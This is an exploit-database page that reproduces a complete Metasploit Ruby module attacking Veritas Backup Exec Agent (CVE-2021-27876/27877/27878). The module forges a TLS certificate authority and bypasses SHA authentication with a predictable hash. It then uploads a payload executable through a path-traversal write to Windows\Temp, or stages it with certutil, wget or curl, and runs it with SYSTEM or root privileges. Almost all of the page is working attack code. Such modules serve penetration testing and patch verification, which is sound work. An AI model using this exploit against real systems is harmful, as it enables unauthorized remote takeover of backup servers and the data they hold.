Veritas Backup Exec Agent Remote Code Execution

2022.09.28
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# frozen_string_literal: true ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::NDMPSocket include Msf::Exploit::CmdStager include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Veritas Backup Exec Agent Remote Code Execution', 'Description' => %q{ Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them. This authentication scheme is no longer used within Backup Exec versions, but hadn’t yet been disabled. An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges depending on the platform. The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and including Backup Exec Remote Agent revision 9.3) }, 'License' => MSF_LICENSE, 'Author' => ['Alexander Korotin <0xc0rs[at]gmail.com>'], 'References' => [ ['CVE', '2021-27876'], ['CVE', '2021-27877'], ['CVE', '2021-27878'], ['URL', 'https://www.veritas.com/content/support/en_US/security/VTS21-001'] ], 'Platform' => %w[win linux], 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => %w[certutil vbs psh_invokewebrequest debug_write debug_asm] } ], [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => %w[bourne wget curl echo] } ] ], 'DefaultOptions' => { 'RPORT' => 10_000 }, 'Privileged' => true, 'DisclosureDate' => '2021-03-01', 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => [UNRELIABLE_SESSION], 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options([ OptString.new('SHELL', [true, 'The shell for executing OS command', '/bin/bash'], conditions: ['TARGET', '==', 'Linux']) ]) deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH') end def execute_command(cmd, opts = {}) case target.opts['Platform'] when 'win' wrap_cmd = "C:\\Windows\\System32\\cmd.exe /c \"#{cmd}\"" when 'linux' wrap_cmd = "#{datastore['SHELL']} -c \"#{cmd}\"" end ndmp_sock = opts[:ndmp_sock] ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_EXECUTE_COMMAND, NdmpExecuteCommandReq.new({ cmd: wrap_cmd, unknown: 0 }).to_xdr ) ) end def exploit print_status('Exploiting ...') ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect fail_with(Msf::Module::Failure::NotFound, "Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status ndmp_status, msg_fail_reason = tls_enabling(ndmp_sock) fail_with(Msf::Module::Failure::UnexpectedReply, "Can not establish TLS connection. #{msg_fail_reason}") unless ndmp_status ndmp_status, msg_fail_reason = sha_authentication(ndmp_sock) fail_with(Msf::Module::Failure::NotVulnerable, "Can not authenticate with SHA. #{msg_fail_reason}") unless ndmp_status if target.opts['Platform'] == 'win' filename = "#{rand_text_alpha(8)}.exe" ndmp_status, msg_fail_reason = win_write_upload(ndmp_sock, filename) if ndmp_status ndmp_status, msg_fail_reason = exec_win_command(ndmp_sock, filename) fail_with(Msf::Module::Failure::PayloadFailed, "Can not execute payload. #{msg_fail_reason}") unless ndmp_status else print_status('Can not upload payload with NDMP_FILE_WRITE packet. Trying to upload with CmdStager') execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 }) end else print_status('Uploading payload with CmdStager') execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 }) end end def check print_status('Checking vulnerability') ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect return Exploit::CheckCode::Unknown("Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status print_status('Getting supported authentication types') ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request(NDMP::Message::CONFIG_GET_SERVER_INFO) ) ndmp_payload = NdmpConfigGetServerInfoRes.from_xdr(ndmp_msg.body) print_status("Supported authentication by BE agent: #{ndmp_payload.auth_types.map do |k, _| "#{AUTH_TYPES[k]} (#{k})" end.join(', ')}") print_status("BE agent revision: #{ndmp_payload.revision}") if ndmp_payload.auth_types.include?(5) Exploit::CheckCode::Appears('SHA authentication is enabled') else Exploit::CheckCode::Safe('SHA authentication is disabled') end end def ndmp_connect print_status('Connecting to BE Agent service') ndmp_msg = nil begin ndmp_sock = NDMP::Socket.new(connect) rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused => e return [false, nil, e.to_s] end begin Timeout.timeout(datastore['ConnectTimeout']) do ndmp_msg = ndmp_sock.read_ndmp_msg(NDMP::Message::NOTIFY_CONNECTED) end rescue Timeout::Error return [false, nil, 'No NDMP_NOTIFY_CONNECTED (0x502) packet from BE Agent service'] else ndmp_payload = NdmpNotifyConnectedRes.from_xdr(ndmp_msg.body) end ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP::Message::CONNECT_OPEN, NdmpConnectOpenReq.new({ version: ndmp_payload.version }).to_xdr ) ) ndmp_payload = NdmpConnectOpenRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, ndmp_sock, "Error code of NDMP_CONNECT_OPEN (0x900) packet: #{ndmp_payload.err_code}"] end [true, ndmp_sock, nil] end def tls_enabling(ndmp_sock) print_status('Enabling TLS for NDMP connection') ndmp_tls_certs = NdmpTlsCerts.new('VeritasBE', datastore['RHOSTS'].to_s) ndmp_tls_certs.forge_ca ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_SSL_HANDSHAKE, NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_REQ])).to_xdr ) ) ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"] end ndmp_tls_certs.sign_agent_csr(ndmp_payload.data) ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_SSL_HANDSHAKE, NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED])).to_xdr ) ) ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of SSL_HANDSHAKE_CSR_SIGNED (3) packet: #{ndmp_payload.err_code}"] end ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_SSL_HANDSHAKE, NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CONNECT])).to_xdr ) ) ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of SSL_HANDSHAKE_CONNECT (4) packet: #{ndmp_payload.err_code}"] end ssl_context = OpenSSL::SSL::SSLContext.new ssl_context.add_certificate(ndmp_tls_certs.ca_cert, ndmp_tls_certs.ca_key) ndmp_sock.wrap_with_ssl(ssl_context) [true, nil] end def sha_authentication(ndmp_sock) print_status('Passing SHA authentication') ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_CONFIG_GET_AUTH_ATTR, NdmpConfigGetAuthAttrReq.new({ auth_type: 5 }).to_xdr ) ) ndmp_payload = NdmpConfigGetAuthAttrRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_CONFIG_GET_AUTH_ATTR (0x103) packet: #{ndmp_payload.err_code}"] end ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP::Message::CONNECT_CLIENT_AUTH, NdmpConnectClientAuthReq.new( { auth_type: 5, username: 'Administrator', # Doesn't metter hash: Digest::SHA256.digest("\x00" * 64 + ndmp_payload.challenge) } ).to_xdr ) ) ndmp_payload = NdmpConnectClientAuthRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_CONECT_CLIENT_AUTH (0x901) packet: #{ndmp_payload.err_code}"] end [true, nil] end def win_write_upload(ndmp_sock, filename) print_status('Uploading payload with NDMP_FILE_WRITE packet') ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_FILE_OPEN_EXT, NdmpFileOpenExtReq.new( { filename: filename, dir: '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\Temp', mode: 4 } ).to_xdr ) ) ndmp_payload = NdmpFileOpenExtRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_FILE_OPEN_EXT (0xf308) packet: #{ndmp_payload.err_code}"] end hnd = ndmp_payload.handler exe = generate_payload_exe offset = 0 block_size = 2048 while offset < exe.length ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_FILE_WRITE, NdmpFileWriteReq.new({ handler: hnd, len: block_size, data: exe[offset, block_size] }).to_xdr ) ) ndmp_payload = NdmpFileWriteRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_FILE_WRITE (0xF309) packet: #{ndmp_payload.err_code}"] end offset += block_size end ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_FILE_CLOSE, NdmpFileCloseReq.new({ handler: hnd }).to_xdr ) ) ndmp_payload = NdmpFileCloseRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_FILE_CLOSE (0xF306) packet: #{ndmp_payload.err_code}"] end [true, nil] end def exec_win_command(ndmp_sock, filename) cmd = "C:\\Windows\\System32\\cmd.exe /c \"C:\\Windows\\Temp\\#{filename}\"" ndmp_msg = ndmp_sock.do_request_response( NDMP::Message.new_request( NDMP_EXECUTE_COMMAND, NdmpExecuteCommandReq.new({ cmd: cmd, unknown: 0 }).to_xdr ) ) ndmp_payload = NdmpExecuteCommandRes.from_xdr(ndmp_msg.body) unless ndmp_payload.err_code.zero? return [false, "Error code of NDMP_EXECUTE_COMMAND (0xF30F) packet: #{ndmp_payload.err_code}"] end [true, nil] end # Class to create CA and client certificates class NdmpTlsCerts def initialize(hostname, ip) @hostname = hostname @ip = ip @ca_key = nil @ca_cert = nil @be_agent_cert = nil end SSL_HANDSHAKE_TYPES = { SSL_HANDSHAKE_TEST_CERT: 1, SSL_HANDSHAKE_CSR_REQ: 2, SSL_HANDSHAKE_CSR_SIGNED: 3, SSL_HANDSHAKE_CONNECT: 4 }.freeze attr_reader :ca_cert, :ca_key def forge_ca @ca_key = OpenSSL::PKey::RSA.new(2048) @ca_cert = OpenSSL::X509::Certificate.new @ca_cert.version = 2 @ca_cert.serial = rand(2**32..2**64 - 1) @ca_cert.subject = @ca_cert.issuer = OpenSSL::X509::Name.parse("/CN=#{@hostname}") extn_factory = OpenSSL::X509::ExtensionFactory.new(@ca_cert, @ca_cert) @ca_cert.extensions = [ extn_factory.create_extension('subjectKeyIdentifier', 'hash'), extn_factory.create_extension('basicConstraints', 'CA:TRUE'), extn_factory.create_extension('keyUsage', 'keyCertSign, cRLSign') ] @ca_cert.add_extension(extn_factory.create_extension('authorityKeyIdentifier', 'keyid:always')) @ca_cert.public_key = @ca_key.public_key @ca_cert.not_before = Time.now - 7 * 60 * 60 * 24 @ca_cert.not_after = Time.now + 14 * 24 * 60 * 60 @ca_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256')) end def sign_agent_csr(csr) o_csr = OpenSSL::X509::Request.new(csr) @be_agent_cert = OpenSSL::X509::Certificate.new @be_agent_cert.version = 2 @be_agent_cert.serial = rand(2**32..2**64 - 1) @be_agent_cert.not_before = Time.now - 7 * 60 * 60 * 24 @be_agent_cert.not_after = Time.now + 14 * 24 * 60 * 60 @be_agent_cert.issuer = @ca_cert.subject @be_agent_cert.subject = o_csr.subject @be_agent_cert.public_key = o_csr.public_key @be_agent_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256')) end def default_sslpacket_content(ssl_packet_type) if ssl_packet_type == SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED] ca_cert = @ca_cert.to_s agent_cert = @be_agent_cert.to_s else ca_cert = '' agent_cert = '' end { ssl_packet_type: ssl_packet_type, hostname: @hostname, nb_hostname: @hostname.upcase, ip_addr: @ip, cert_id1: get_cert_id(@ca_cert), cert_id2: get_cert_id(@ca_cert), unknown1: 0, unknown2: 0, ca_cert_len: ca_cert.length, ca_cert: ca_cert, agent_cert_len: agent_cert.length, agent_cert: agent_cert } end def get_cert_id(cert) Digest::SHA1.digest(cert.issuer.to_s + cert.serial.to_s(2))[0...4].unpack1('L<') end end NDMP_CONFIG_GET_AUTH_ATTR = 0x103 NDMP_SSL_HANDSHAKE = 0xf383 NDMP_EXECUTE_COMMAND = 0xf30f NDMP_FILE_OPEN_EXT = 0xf308 NDMP_FILE_WRITE = 0xF309 NDMP_FILE_CLOSE = 0xF306 AUTH_TYPES = { 1 => 'Text', 2 => 'MD5', 3 => 'BEWS', 4 => 'SSPI', 5 => 'SHA', 190 => 'BEWS2' # 0xBE }.freeze # Responce packets class NdmpNotifyConnectedRes < XDR::Struct attribute :connected, XDR::Int attribute :version, XDR::Int attribute :reason, XDR::Int end class NdmpConnectOpenRes < XDR::Struct attribute :err_code, XDR::Int end class NdmpConfigGetServerInfoRes < XDR::Struct attribute :err_code, XDR::Int attribute :vendor_name, XDR::String[] attribute :product_name, XDR::String[] attribute :revision, XDR::String[] attribute :auth_types, XDR::VarArray[XDR::Int] end class NdmpConfigGetHostInfoRes < XDR::Struct attribute :err_code, XDR::Int attribute :hostname, XDR::String[] attribute :os, XDR::String[] attribute :os_info, XDR::String[] attribute :ip, XDR::String[] end class NdmpSslHandshakeRes < XDR::Struct attribute :data_len, XDR::Int attribute :data, XDR::String[] attribute :err_code, XDR::Int attribute :unknown4, XDR::String[] end class NdmpConfigGetAuthAttrRes < XDR::Struct attribute :err_code, XDR::Int attribute :auth_type, XDR::Int attribute :challenge, XDR::Opaque[64] end class NdmpConnectClientAuthRes < XDR::Struct attribute :err_code, XDR::Int end class NdmpExecuteCommandRes < XDR::Struct attribute :err_code, XDR::Int end class NdmpFileOpenExtRes < XDR::Struct attribute :err_code, XDR::Int attribute :handler, XDR::Int end class NdmpFileWriteRes < XDR::Struct attribute :err_code, XDR::Int attribute :recv_len, XDR::Int attribute :unknown, XDR::Int end class NdmpFileCloseRes < XDR::Struct attribute :err_code, XDR::Int end # Request packets class NdmpConnectOpenReq < XDR::Struct attribute :version, XDR::Int end class NdmpSslHandshakeReq < XDR::Struct attribute :ssl_packet_type, XDR::Int attribute :nb_hostname, XDR::String[] attribute :hostname, XDR::String[] attribute :ip_addr, XDR::String[] attribute :cert_id1, XDR::Int attribute :cert_id2, XDR::Int attribute :unknown1, XDR::Int attribute :unknown2, XDR::Int attribute :ca_cert_len, XDR::Int attribute :ca_cert, XDR::String[] attribute :agent_cert_len, XDR::Int attribute :agent_cert, XDR::String[] end class NdmpConfigGetAuthAttrReq < XDR::Struct attribute :auth_type, XDR::Int end class NdmpConnectClientAuthReq < XDR::Struct attribute :auth_type, XDR::Int attribute :username, XDR::String[] attribute :hash, XDR::Opaque[32] end class NdmpExecuteCommandReq < XDR::Struct attribute :cmd, XDR::String[] attribute :unknown, XDR::Int end class NdmpFileOpenExtReq < XDR::Struct attribute :filename, XDR::String[] attribute :dir, XDR::String[] attribute :mode, XDR::Int end class NdmpFileWriteReq < XDR::Struct attribute :handler, XDR::Int attribute :len, XDR::Int attribute :data, XDR::String[] end class NdmpFileCloseReq < XDR::Struct attribute :handler, XDR::Int end end


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top